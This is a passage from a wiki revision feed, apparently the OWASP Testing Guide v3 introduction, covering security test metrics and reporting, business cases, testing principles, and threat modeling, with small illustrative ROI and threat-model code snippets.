*Reducing the overall number of vulnerabilities by 30%&lt;br /&gt;
*Security issues are expected to be fixed by a certain deadline (e.g., before beta release) &lt;br /&gt;
&lt;br /&gt;
Security test data can be absolute, such as the number of vulnerabilities detected during manual code review, as well as comparative, such as the number of vulnerabilities detected in code reviews vs. penetration tests. To answer questions about the quality of the security process, it is important to determine a baseline for what could be considered acceptable and good. &lt;br /&gt;
&lt;br /&gt;
Security test data can also support specific objectives of the security analysis such as compliance with security regulations and information security standards, management of security processes, the identification of security root causes and process improvements, and security costs vs. benefits analysis.&lt;br /&gt;
&lt;br /&gt;
When security test data is reported, it has to provide metrics to support the analysis. The scope of the analysis is the interpretation of test data to find clues about the security of the software being produced as well as the effectiveness of the process. &lt;br /&gt;
Some examples of clues supported by security test data can be:&lt;br /&gt;
*Are vulnerabilities reduced to an acceptable level for release?&lt;br /&gt;
*How does the security quality of this product compare with similar software products?&lt;br /&gt;
*Are all security test requirements being met? &lt;br /&gt;
*What are the major root causes of security issues?&lt;br /&gt;
*How numerous are security flaws compared to security bugs?&lt;br /&gt;
*Which security activity is most effective in finding vulnerabilities?&lt;br /&gt;
*Which team is more productive in fixing security defects and vulnerabilities?&lt;br /&gt;
*Which percentage of overall vulnerabilities are high risk?&lt;br /&gt;
*Which tools are most effective in detecting security vulnerabilities?&lt;br /&gt;
*Which kind of security tests are most effective in finding vulnerabilities (e.g., white box vs. black box tests)?&lt;br /&gt;
*How many security issues are found during secure code reviews?&lt;br /&gt;
*How many security issues are found during secure design reviews?&lt;br /&gt;
&lt;br /&gt;
In order to make a sound judgment using the testing data, it is important to have a good understanding of the testing process as well as the testing tools. A tool taxonomy should be adopted to decide which security tools should be used. Security tools can be qualified as being good at finding common known vulnerabilities targeting different artifacts.&lt;br /&gt;
The issue is that unknown security issues remain untested: coming out clean does not mean that your software or application is secure. Some studies [22] have demonstrated that, at best, tools can find only 45% of overall vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
Even the most sophisticated automation tools are not a match for an experienced security tester: just relying on successful test results from automation tools will give security practitioners a false sense of security.  Typically, the more experienced the security testers are with the security testing methodology and testing tools, the better the results of the security test and analysis will be. It is important that managers making an investment in security testing tools also consider an investment in hiring skilled human resources as well as security test training.&lt;br /&gt;
&lt;br /&gt;
'''Reporting Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The security posture of an application can be characterized from the perspective of the effect, such as number of vulnerabilities and the risk rating of the vulnerabilities, as well as from the perspective of the cause (i.e., origin) such as coding errors, architectural flaws, and configuration issues.  &lt;br /&gt;
&lt;br /&gt;
Vulnerabilities can be classified according to different criteria. This can be a statistical categorization, such as the OWASP Top 10 and WASC (Web Application Security Statistics) project, or related to defensive controls as in the case of WASF (Web Application Security Framework) categorization.&lt;br /&gt;
&lt;br /&gt;
When reporting security test data, the best practice is to include the following information, besides the categorization of each vulnerability by type:&lt;br /&gt;
*The security threat that the issue is exposed to&lt;br /&gt;
*The root cause of security issues (e.g., security bugs, security flaw)&lt;br /&gt;
*The testing technique used to find it&lt;br /&gt;
*The remediation of the vulnerability (e.g., the countermeasure) &lt;br /&gt;
*The risk rating of the vulnerability (High, Medium, Low)&lt;br /&gt;
&lt;br /&gt;
By describing what the security threat is, it will be possible to understand if and why the mitigation control is ineffective in mitigating the threat. &lt;br /&gt;
&lt;br /&gt;
Reporting the root cause of the issue can help pinpoint what needs to be fixed: in the case of a white box testing, for example, the software security root cause of the vulnerability will be the offending source code. &lt;br /&gt;
&lt;br /&gt;
Once issues are reported, it is also important to provide guidance to the software developer on how to re-test and find the vulnerability. This might involve using a white box testing technique (e.g., security code review with a static code analyzer) to find if the code is vulnerable. If a vulnerability can be found via a black box technique (penetration test), the test report also needs to provide information on how to validate the exposure of the vulnerability to the front end (e.g., client).&lt;br /&gt;
&lt;br /&gt;
The information about how to fix the vulnerability should be detailed enough for a developer to implement a fix. It should provide secure coding examples, configuration changes, and provide adequate references.&lt;br /&gt;
&lt;br /&gt;
Finally the risk rating helps to prioritize the remediation effort. Typically, assigning a risk rating to the vulnerability involves a risk analysis based upon factors such as impact and exposure.&lt;br /&gt;
&lt;br /&gt;
'''Business Cases'''&amp;lt;br&amp;gt; &lt;br /&gt;
For the security test metrics to be useful, they need to provide value back to the organization's security test data stakeholders, such as project managers, developers, information security offices, auditors, and chief information officers. The value can be in terms of the business case that each project stakeholder has in terms of role and responsibility.&lt;br /&gt;
&lt;br /&gt;
Software developers look at security test data to show that software is coded more securely and efficiently, so that they can make the case of using source code analysis tools as well as following secure coding standards and attending software security training. &lt;br /&gt;
&lt;br /&gt;
Project managers look for data that allows them to successfully manage and utilize security testing activities and resources according to the project plan. To project managers, security test data can show that projects are on schedule and moving on target for delivery dates and are getting better during tests. &lt;br /&gt;
&lt;br /&gt;
Security test data also helps the business case for security testing if the initiative comes from information security officers (ISOs). For example, it can provide evidence that security testing during the SDLC does not impact the project delivery, but rather reduces the overall workload needed to address vulnerabilities later in production. &lt;br /&gt;
&lt;br /&gt;
To compliance auditors, security test metrics provide a level of software security assurance and confidence that security standard compliance is addressed through the security review processes within the organization. &lt;br /&gt;
&lt;br /&gt;
Finally, Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs), responsible for the budget that needs to be allocated in security resources, look for derivation of a cost/benefit analysis from security test data to make informed decisions on which security activities and tools to invest. One of the metrics that support such analysis is the Return On Investment (ROI) in Security [23]. To derive such metrics from security test data, it is important to quantify the differential between the risk due to the exposure of vulnerabilities and the effectiveness of the security tests in mitigating the security risk, and factor this gap with the cost of the security testing activity or the testing tools adopted.&lt;br /&gt;
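The ROI derivation described above is often expressed as Return on Security Investment (ROSI): the risk reduction achieved by the security activity, minus its cost, over that cost. This is one common formulation, not the specific metric of [23], and the dollar figures in the example are assumptions for illustration.

```python
def rosi(annual_loss_expectancy, mitigation_ratio, cost):
    """Return on Security Investment, in one common formulation:
    (ALE * mitigation ratio - cost of the security activity) / cost.
    """
    risk_reduction = annual_loss_expectancy * mitigation_ratio
    return (risk_reduction - cost) / cost


# Assumed inputs: $200k expected annual loss from the vulnerabilities,
# security tests mitigating 75% of it, at a $50k cost in testing
# activity and tools.
example = rosi(200_000, 0.75, 50_000)
```

With these assumed inputs the metric evaluates to 2.0, i.e., each dollar spent on testing avoids two dollars of expected loss, which is the kind of differential a CIO or CISO can weigh when allocating the security budget.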
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] T. DeMarco, ''Controlling Software Projects: Management, Measurement and Estimation'', Yourdon Press, 1982&lt;br /&gt;
&lt;br /&gt;
[2] S. Payne, ''A Guide to Security Metrics'' - http://www.sans.org/reading_room/whitepapers/auditing/55.php&lt;br /&gt;
&lt;br /&gt;
[3] NIST, ''The economic impacts of inadequate infrastructure for software testing'' - http://www.nist.gov/public_affairs/releases/n02-10.htm&lt;br /&gt;
&lt;br /&gt;
[4] Ross Anderson, ''Economics and Security Resource Page'' - http://www.cl.cam.ac.uk/users/rja14/econsec.html &lt;br /&gt;
&lt;br /&gt;
[5] Denis Verdon, ''Teaching Developers To Fish'' - [[OWASP AppSec NYC 2004]]&lt;br /&gt;
&lt;br /&gt;
[6] Bruce Schneier, ''Cryptogram Issue #9'' - http://www.schneier.com/crypto-gram-0009.html&lt;br /&gt;
&lt;br /&gt;
[7] Symantec, ''Threat Reports'' -  http://www.symantec.com/business/theme.jsp?themeid=threatreport&lt;br /&gt;
&lt;br /&gt;
[8] FTC, ''The Gramm-Leach Bliley Act'' - http://www.ftc.gov/privacy/privacyinitiatives/glbact.html&lt;br /&gt;
&lt;br /&gt;
[9] Senator Peace and Assembly Member Simitian, ''SB 1386''- http://www.leginfo.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html&lt;br /&gt;
&lt;br /&gt;
[10] European Union, ''Directive 95/46/EC on the protection of individuals with regard to the processing of personal data and on the free movement of such data'' -&lt;br /&gt;
http://ec.europa.eu/justice_home/fsj/privacy/docs/95-46-ce/dir1995-46_part1_en.pdf&lt;br /&gt;
&lt;br /&gt;
[11] NIST, '' Risk management guide for information technology systems'' - http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf&lt;br /&gt;
&lt;br /&gt;
[12] SEI, Carnegie Mellon, ''Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE)'' - http://www.cert.org/octave/&lt;br /&gt;
&lt;br /&gt;
[13] Ken Thompson, ''Reflections on Trusting Trust'', reprinted from Communications of the ACM - http://cm.bell-labs.com/who/ken/trust.html [[Category:FIXME|link not working]]&lt;br /&gt;
&lt;br /&gt;
[14] Gary McGraw, ''Beyond the Badness-ometer'' - http://www.ddj.com/security/189500001&lt;br /&gt;
&lt;br /&gt;
[15] FFIEC, '' Authentication in an Internet Banking Environment'' - http://www.ffiec.gov/pdf/authentication_guidance.pdf&lt;br /&gt;
&lt;br /&gt;
[16] PCI Security Standards Council, ''PCI Data Security Standard'' - https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml &lt;br /&gt;
&lt;br /&gt;
[17] MSDN, ''Cheat Sheet: Web Application Security Frame'' - http://msdn.microsoft.com/en-us/library/ms978518.aspx#tmwacheatsheet_webappsecurityframe &lt;br /&gt;
&lt;br /&gt;
[18] MSDN, ''Improving Web Application Security, Chapter 2, Threat And Countermeasures'' - http://msdn.microsoft.com/en-us/library/aa302418.aspx&lt;br /&gt;
&lt;br /&gt;
[19] Gil Regev, Ian Alexander,Alain Wegmann, ''Use Cases and Misuse Cases Model the Regulatory Roles of Business Processes'' - http://easyweb.easynet.co.uk/~iany/consultancy/regulatory_processes/regulatory_processes.htm&lt;br /&gt;
&lt;br /&gt;
[20] Sindre, G., Opdahl, A., ''Capturing Security Requirements Through Misuse Cases'' - http://folk.uio.no/nik/2001/21-sindre.pdf&lt;br /&gt;
&lt;br /&gt;
[21] Security Across the Software Development Lifecycle Task Force, ''Referred Data from Capers Jones, Software Assessments, Benchmarks and Best Practices'' - http://www.cyberpartnership.org/SDLCFULL.pdf&lt;br /&gt;
&lt;br /&gt;
[22] MITRE, ''Being Explicit About Weaknesses, Slide 30, Coverage of CWE'' - http://cwe.mitre.org/documents/being-explicit/BlackHatDC_BeingExplicit_Slides.ppt&lt;br /&gt;
&lt;br /&gt;
[23] Marco Morana, ''Building Security Into The Software Life Cycle, A Business Case'' - http://www.blackhat.com/presentations/bh-usa-06/bh-us-06-Morana-R3.0.pdf&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=62230</id>
		<title>Testing Guide Introduction</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_Guide_Introduction&amp;diff=62230"/>
				<updated>2009-05-27T12:37:48Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Security Test Data Analysis and Reporting */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
=== The OWASP Testing Project ===&lt;br /&gt;
----&lt;br /&gt;
The OWASP Testing Project has been in development for many years. With this project, we wanted to help people understand the ''what'', ''why'', ''when'', ''where'', and ''how'' of testing their web applications, and not just provide a simple checklist or prescription of issues that should be addressed. The outcome of this project is a complete Testing Framework, from which others can build their own testing programs or qualify other people’s processes. The Testing Guide describes in detail both the general Testing Framework and the techniques required to implement the framework in practice.&lt;br /&gt;
&lt;br /&gt;
Writing the Testing Guide has proven to be a difficult task. It has been a challenge to obtain consensus and develop the content that allows people to apply the concepts described here, while enabling them to work in their own environment and culture. It has also been a challenge to change the focus of web application testing from penetration testing to testing integrated in the software development life cycle. &lt;br /&gt;
&lt;br /&gt;
However, we are very satisfied with the results we have reached. Many industry experts and those responsible for software security at some of the largest companies in the world are validating the Testing Framework. This framework helps organizations test their web applications in order to build reliable and secure software, rather than simply highlighting areas of weakness, although the latter is certainly a byproduct of many of OWASP’s guides and checklists. As such, we have made some hard decisions about the appropriateness of certain testing techniques and technologies, which we fully understand will not be agreed upon by everyone. However, OWASP is able to take the high ground and change culture over time through awareness and education based on consensus and experience.&lt;br /&gt;
&lt;br /&gt;
The rest of this guide is organized as follows. This introduction covers the pre-requisites of testing web applications: the scope of testing, the principles of successful testing, and testing techniques. Chapter 3 presents the OWASP Testing Framework and explains its techniques and tasks in relation to the various phases of the software development life cycle. Chapter 4 covers how to test for specific vulnerabilities (e.g., SQL Injection) by code inspection and penetration testing. &lt;br /&gt;
&lt;br /&gt;
'''Measuring (in)security: the Economics of Insecure Software'''&amp;lt;br&amp;gt;&lt;br /&gt;
A basic tenet of software engineering is that you can't control what you can't measure [1]. Security testing is no different. Unfortunately, measuring security is a notoriously difficult process. We will not cover this topic in detail here, since it would take a guide on its own (for an introduction, see [2]). &lt;br /&gt;
&lt;br /&gt;
One aspect that we want to emphasize, however, is that security measurements are, by necessity, about both the specific, technical issues (e.g., how prevalent a certain vulnerability is) and how these affect the economics of software. We find that most technical people have at least a basic understanding, and often a deeper one, of the vulnerabilities. Sadly, few are able to translate that technical knowledge into monetary terms and thereby quantify the potential cost of vulnerabilities to the application owner's business. We believe that until this happens, CIOs will not be able to develop an accurate return on security investment and, subsequently, assign appropriate budgets for software security.&amp;lt;br/&amp;gt;&lt;br /&gt;
While estimating the cost of insecure software may appear a daunting task, recently there has been a significant amount of work in this direction. For example, in June 2002, the US National Institute of Standards (NIST) published a survey on the cost of insecure software to the US economy due to inadequate software testing [3]. Interestingly, they estimate that a better testing infrastructure would save more than a third of these costs, or about $22 billion a year. More recently, the links between economics and security have been studied by academic researchers. See [4] for more information about some of these efforts.&lt;br /&gt;
&lt;br /&gt;
The framework described in this document encourages people to measure security throughout their entire development process. They can then relate the cost of insecure software to the impact it has on their business, and consequently develop appropriate business decisions (resources) to manage the risk. Remember: measuring and testing web applications is even more critical than for other software, since web applications are exposed to millions of users through the Internet.&lt;br /&gt;
&lt;br /&gt;
'''What is Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
What do we mean by testing? During the development life cycle of a web application, many things need to be tested. The Merriam-Webster Dictionary describes testing as: &lt;br /&gt;
* To put to test or proof. &lt;br /&gt;
* To undergo a test. &lt;br /&gt;
* To be assigned a standing or evaluation based on tests. &lt;br /&gt;
For the purposes of this document, testing is a process of comparing the state of a system/application against a set of criteria. In the security industry, people frequently test against a set of mental criteria that are neither well defined nor complete. For this reason and others, many outsiders regard security testing as a black art. This document’s aim is to change that perception and to make it easier for people without in-depth security knowledge to make a difference. &lt;br /&gt;
&lt;br /&gt;
'''Why Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
This document is designed to help organizations understand what comprises a testing program, and to help them identify the steps that they need to undertake to build and operate that testing program on their web applications. It is intended to give a broad view of the elements required to make a comprehensive web application security program. This guide can be used as a reference and as a methodology to help determine the gap between your existing practices and industry best practices. This guide allows organizations to compare themselves against industry peers, understand the magnitude of resources required to test and maintain their software, or prepare for an audit. This chapter does not go into the technical details of how to test an application, as the intent is to provide a typical security organizational framework. The technical details about how to test an application, as part of a penetration test or code review will be covered in the remaining parts of this document. &lt;br /&gt;
&lt;br /&gt;
'''When to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
Most people today don’t test the software until it has already been created and is in the deployment phase of its life cycle (i.e., code has been created and instantiated into a working web application). This is generally a very ineffective and cost-prohibitive practice. One of the best methods to prevent security bugs from appearing in production applications is to improve the Software Development Life Cycle (SDLC) by including security in each of its phases. An SDLC is a structure imposed on the development of software artifacts. If an SDLC is not currently being used in your environment, it is time to pick one! The following figure shows a generic SDLC model as well as the (estimated) increasing cost of fixing security bugs in such a model. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:SDLC.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 1: Generic SDLC Model'' &amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Companies should inspect their overall SDLC to ensure that security is an integral part of the development process. SDLCs should include security tests to ensure security is adequately covered and controls are effective throughout the development process. &lt;br /&gt;
&lt;br /&gt;
'''What to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
It can be helpful to think of software development as a combination of people, process, and technology. If these are the factors that &amp;quot;create&amp;quot; software, then it is logical that these are the factors that must be tested. Today most people generally test the technology or the software itself. &lt;br /&gt;
&lt;br /&gt;
An effective testing program should have components that test ''People'' – to ensure that there is adequate education and awareness; ''Process'' – to ensure that there are adequate policies and standards and that people know how to follow these policies; ''Technology'' – to ensure that the process has been effective in its implementation. Unless a holistic approach is adopted, testing just the technical implementation of an application will not uncover management or operational vulnerabilities that could be present. By testing the people, policies, and processes, an organization can catch issues that would later manifest themselves into defects in the technology, thus eradicating bugs early and identifying the root causes of defects. Likewise, testing only some of the technical issues that can be present in a system will result in an incomplete and inaccurate security posture assessment. Denis Verdon, Head of Information Security at [http://www.fnf.com Fidelity National Financial] presented an excellent analogy for this misconception at the OWASP AppSec 2004 Conference in New York [5]: &amp;quot;If cars were built like applications [...] safety tests would assume frontal impact only. Cars would not be roll tested, or tested for stability in emergency maneuvers, brake effectiveness, side impact, and resistance to theft.&amp;quot; &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Feedback and Comments'''&amp;lt;br&amp;gt;&lt;br /&gt;
As with all OWASP projects, we welcome comments and feedback. We especially like to know that our work is being used and that it is effective and accurate.&lt;br /&gt;
&lt;br /&gt;
==Principles of Testing==&lt;br /&gt;
&lt;br /&gt;
There are some common misconceptions when developing a testing methodology to weed out security bugs in software. This chapter covers some of the basic principles that should be taken into account by professionals when testing for security bugs in software. &lt;br /&gt;
&lt;br /&gt;
'''There is No Silver Bullet'''&amp;lt;br&amp;gt;&lt;br /&gt;
While it is tempting to think that a security scanner or application firewall will either provide a multitude of defenses or identify a multitude of problems, in reality there are no silver bullets to the problem of insecure software. Application security assessment software, while useful as a first pass to find low-hanging fruit, is generally immature and ineffective at in-depth assessments and at providing adequate test coverage. Remember that security is a process, not a product. &lt;br /&gt;
&lt;br /&gt;
'''Think Strategically, Not Tactically'''&amp;lt;br&amp;gt;&lt;br /&gt;
Over the last few years, security professionals have come to realize the fallacy of the patch-and-penetrate model that was pervasive in information security during the 1990’s. The patch-and-penetrate model involves fixing a reported bug, but without proper investigation of the root cause. This model is usually associated with the window of vulnerability shown in the figure below. The evolution of vulnerabilities in common software used worldwide has shown the ineffectiveness of this model. For more information about the window of vulnerability please refer to [6]. Vulnerability studies [7] have shown that with the reaction time of attackers worldwide, the typical window of vulnerability does not provide enough time for patch installation, since the time between a vulnerability being uncovered and an automated attack against it being developed and released is decreasing every year. The patch-and-penetrate model also rests on several flawed assumptions: patches can interfere with normal operations and break existing applications, and not all users become aware of a patch’s availability. Consequently, not all of a product's users will apply patches, whether because of these side effects or because they simply do not know the patch exists.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:WindowExposure.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 2: Window of Vulnerability''&amp;lt;/center&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
To prevent recurring security problems within an application, it is essential to build security into the Software Development Life Cycle (SDLC) by developing standards, policies, and guidelines that fit and work within the development methodology. Threat modeling and other techniques should be used to help assign appropriate resources to those parts of a system that are most at risk. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The SDLC is King'''&amp;lt;br&amp;gt;&lt;br /&gt;
The SDLC is a process that is well-known to developers. Integrating security into each phase of the SDLC allows for a holistic approach to application security that leverages the procedures already in place within the organization. Be aware that while the names of the various phases may change depending on the SDLC model used by an organization, each conceptual phase of the archetype SDLC will be used to develop the application (i.e., define, design, develop, deploy, maintain). Each phase has security considerations that should become part of the existing process, to ensure a cost-effective and comprehensive security program. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Test Early and Test Often'''&amp;lt;br&amp;gt;&lt;br /&gt;
When a bug is detected early within the SDLC, it can be addressed more quickly and at a lower cost. A security bug is no different from a functional or performance-based bug in this regard. A key step in making this possible is to educate the development and QA organizations about common security issues and the ways to detect and prevent them. Although new libraries, tools, or languages might help design better programs (with fewer security bugs), new threats arise constantly and developers must be aware of those that affect the software they are developing. Education in security testing also helps developers acquire the appropriate mindset to test an application from an attacker's perspective. This allows each organization to consider security issues as part of their existing responsibilities.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Scope of Security'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is important to know how much security a given project will require. The information and assets that are to be protected should be given a classification that states how they are to be handled (e.g., Confidential, Secret, Top Secret). Discussions should occur with legal counsel to ensure that any specific security need will be met. In the USA, such needs might come from federal regulations, such as the Gramm-Leach-Bliley Act [8], or from state laws, such as the California SB-1386 [9]. For organizations based in EU countries, both country-specific regulation and EU Directives might apply. For example, Directive 95/46/EC [10] makes it mandatory to treat personal data in applications with due care, whatever the application. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop the Right Mindset'''&amp;lt;br&amp;gt;&lt;br /&gt;
Successfully testing an application for security vulnerabilities requires thinking &amp;quot;outside of the box.&amp;quot; Normal use cases will test the normal behavior of the application when a user is using it in the manner that you expect. Good security testing requires going beyond what is expected and thinking like an attacker who is trying to break the application. Creative thinking can help to determine what unexpected data may cause an application to fail in an insecure manner. It can also help find which assumptions made by web developers are not always true and how they can be subverted. This is one of the reasons why automated tools are bad at automatically testing for vulnerabilities: this creative thinking must be done on a case-by-case basis, and most web applications are developed in a unique way (even when they use common frameworks). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Subject'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the first major initiatives in any good security program should be to require accurate documentation of the application. The architecture, data-flow diagrams, use cases, and more should be written in formal documents and made available for review. The technical specification and application documents should include information that lists not only the desired use cases, but also any specifically disallowed use case. Finally, it is good to have at least a basic security infrastructure that allows the monitoring and trending of attacks against an organization's applications and network (e.g., IDS systems). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use the Right Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
While we have already stated that there is no silver bullet tool, tools do play a critical role in the overall security program. There is a range of open source and commercial tools that can automate many routine security tasks. These tools can simplify and speed up the security process by assisting security personnel in their tasks. It is important to understand exactly what these tools can and cannot do, however, so that they are not oversold or used incorrectly. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The Devil is in the Details'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is critical not to perform a superficial security review of an application and consider it complete. This will instill a false sense of confidence that can be as dangerous as not having done a security review in the first place. It is vital to carefully review the findings and weed out any false positives that may remain in the report. Reporting an incorrect security finding can often undermine the valid message of the rest of a security report. Care should be taken to verify that every possible section of application logic has been tested, and that every use case scenario was explored for possible vulnerabilities. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use Source Code When Available'''&amp;lt;br&amp;gt;&lt;br /&gt;
While black box penetration test results can be impressive and useful to demonstrate how vulnerabilities are exposed in production, they are not the most effective way to secure an application. If the source code for the application is available, it should be given to the security staff to assist them while performing their review. It is possible to discover vulnerabilities within the application source that would be missed during a black box engagement. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop Metrics'''&amp;lt;br&amp;gt;&lt;br /&gt;
An important part of a good security program is the ability to determine if things are getting better. It is important to track the results of testing engagements, and develop metrics that will reveal the application security trends within the organization. These metrics can show if more education and training are required, if there is a particular security mechanism that is not clearly understood by development, and if the total number of security related problems being found each month is going down. Consistent metrics that can be generated in an automated way from available source code will also help the organization in assessing the effectiveness of mechanisms introduced to reduce security bugs in software development. Metrics are not easily developed, so using standard metrics like those provided by the OWASP Metrics project and other organizations might be a good head start.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Document the Test Results'''&amp;lt;br&amp;gt;&lt;br /&gt;
To conclude the testing process, it is important to produce a formal record of what testing actions were taken, by whom, when they were performed, and details of the test findings. It is wise to agree on an acceptable format for the report that is useful to all concerned parties, who may include developers, project management, business owners, IT department, audit, and compliance. The report must be clear to the business owner in identifying where material risks exist, and sufficient to get their backing for subsequent mitigation actions. The report must be clear to the developer in pin-pointing the exact function that is affected by the vulnerability, with associated recommendations for resolution in a language that the developer will understand (no pun intended). Last but not least, report writing should not be overly burdensome on the security testers themselves; security testers are not generally renowned for their creative writing skills, and agreeing on a complex report can lead to instances where test results do not get properly documented.&lt;br /&gt;
&lt;br /&gt;
==Testing Techniques Explained==&lt;br /&gt;
&lt;br /&gt;
This section presents a high-level overview of various testing techniques that can be employed when building a testing program. It does not present specific methodologies for these techniques, although Chapter 3 will address this information. This section is included to provide context for the framework presented in the next chapter and to highlight the advantages and disadvantages of some of the techniques that should be considered. In particular, we will cover:&lt;br /&gt;
* Manual Inspections &amp;amp; Reviews &lt;br /&gt;
* Threat Modeling &lt;br /&gt;
* Code Review &lt;br /&gt;
* Penetration Testing &lt;br /&gt;
&lt;br /&gt;
=== Manual Inspections &amp;amp; Reviews ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Manual inspections are human-driven reviews that typically test the security implications of the people, policies, and processes, but can include inspection of technology decisions such as architectural designs. They are usually conducted by analyzing documentation or performing interviews with the designers or system owners. While the concept of manual inspections and human reviews is simple, they can be among the most powerful and effective techniques available. Asking someone how something works and why it was implemented in a specific way allows the tester to quickly determine whether any security concerns are likely to be evident. Manual inspections and reviews are one of the few ways to test the software development life-cycle process itself and to ensure that there is an adequate policy or skill set in place. As with many things in life, when conducting manual inspections and reviews we suggest you adopt a trust-but-verify model. Not everything everyone tells you or shows you will be accurate. Manual reviews are particularly good for testing whether people understand the security process, have been made aware of policy, and have the appropriate skills to design or implement a secure application. Other activities, including manually reviewing the documentation, secure coding policies, security requirements, and architectural designs, should all be accomplished using manual inspections.&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Requires no supporting technology &lt;br /&gt;
* Can be applied to a variety of situations&lt;br /&gt;
* Flexible &lt;br /&gt;
* Promotes teamwork &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Can be time consuming &lt;br /&gt;
* Supporting material not always available &lt;br /&gt;
* Requires significant human thought and skill to be effective!&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Threat modeling has become a popular technique to help system designers think about the security threats that their systems/applications might face. Therefore, threat modeling can be seen as risk assessment for applications. In fact, it enables the designer to develop mitigation strategies for potential vulnerabilities and helps them focus their inevitably limited resources and attention on the parts of the system that most require it. It is recommended that all applications have a threat model developed and documented. Threat models should be created as early as possible in the SDLC, and should be revisited as the application evolves and development progresses. To develop a threat model, we recommend taking a simple approach that follows the NIST 800-30 [11] standard for risk assessment. This approach involves: &lt;br /&gt;
* Decomposing the application – understand, through a process of manual inspection, how the application works, its assets, functionality, and connectivity. &lt;br /&gt;
* Defining and classifying the assets – classify the assets into tangible and intangible assets and rank them according to business importance. &lt;br /&gt;
* Exploring potential vulnerabilities - whether technical, operational, or management. &lt;br /&gt;
* Exploring potential threats – develop a realistic view of potential attack vectors from an attacker’s perspective, by using threat scenarios or attack trees.&lt;br /&gt;
* Creating mitigation strategies – develop mitigating controls for each of the threats deemed to be realistic. &lt;br /&gt;
The output from a threat model itself can vary, but is typically a collection of lists and diagrams. The OWASP Code Review Guide outlines an Application Threat Modeling methodology that can be used as a reference for testing applications for potential security flaws in their design. There is no right or wrong way to develop threat models and perform information risk assessments on applications [12]. &amp;lt;br&amp;gt;&lt;br /&gt;
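The steps above can be sketched as a simple data structure. The following is an illustrative sketch only, assuming a basic likelihood-times-impact ranking; the class and field names are hypothetical and not part of any OWASP methodology.&lt;br /&gt;

```java
// Hypothetical sketch: one threat-model entry, ranked by likelihood x impact
// (each on a 1-3 scale) so that mitigation effort can be prioritized.
public class ThreatEntry {
    final String asset;       // what is at risk (tangible or intangible)
    final String threat;      // attack vector from the attacker's perspective
    final String mitigation;  // mitigating control for this threat
    final int likelihood;     // 1 (low) .. 3 (high)
    final int impact;         // 1 (low) .. 3 (high)

    public ThreatEntry(String asset, String threat, String mitigation,
                       int likelihood, int impact) {
        this.asset = asset;
        this.threat = threat;
        this.mitigation = mitigation;
        this.likelihood = likelihood;
        this.impact = impact;
    }

    // Simple qualitative risk score: higher means address it first.
    public int risk() {
        return likelihood * impact;
    }

    public static void main(String[] args) {
        ThreatEntry e = new ThreatEntry(
                "customer credentials",
                "credential theft via SQL injection",
                "parameterized queries and input validation",
                3, 3);
        System.out.println(e.asset + " risk=" + e.risk()); // prints: customer credentials risk=9
    }
}
```

Ranking entries this way is one concrete means of focusing inevitably limited resources on the parts of the system most at risk.&lt;br /&gt;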
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Practical attacker's view of the system &lt;br /&gt;
* Flexible &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Relatively new technique &lt;br /&gt;
* Good threat models don’t automatically mean good software&lt;br /&gt;
&lt;br /&gt;
=== Source Code Review ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
